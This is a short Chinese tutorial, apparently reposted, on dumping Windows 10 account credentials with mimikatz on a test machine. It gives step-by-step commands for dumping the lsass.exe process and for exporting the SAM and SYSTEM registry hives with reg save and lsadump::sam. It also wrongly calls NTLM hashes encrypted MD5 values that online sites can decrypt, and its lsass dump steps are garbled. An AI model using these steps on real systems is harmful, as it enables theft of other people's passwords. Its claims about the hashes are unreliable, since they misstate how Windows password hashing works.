准备工具:
一台windows10测试机
mimikatz(猕猴桃破解工具)
1.破解win10下当前账户的密码
原理是从内存中破解
打开任务管理器
详细信息->按ls找到名为lsass.exe的进程
右键
输入lsass搜索
把此文件复制到猕猴桃x64文件夹下
以管理员身份运行猕猴桃
输入以下三条命令:
privilege::debug sekurlsa::logonPasswords full
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
到此步
NTLM是加密过的账户密码
把加密的密码拿去md5解密网站解密就得到了windows密码
2.破解win10所有账户密码
此方法破解win10下所有账户的密码
原理是利用注册表文件
打开带管理员权限的cmd窗口
进入根目录
cd \
导出hash:
reg save hklm\sam sam.hive
reg save hklm\system system.hive
进入根
剪切刚刚导出的注册表文件到猕猴桃x64目录下
以管理员权限打开猕猴桃
此步破解将会获得所有账户的哈希密码
lsadump::sam /sam:sam.hive /system:system.hive
(测试机只有一个账户)
将得到的md5值拿到在线md5解密网站即可获得密码
版权归原作者 cislandxor 所有, 如有侵权,请联系我们删除。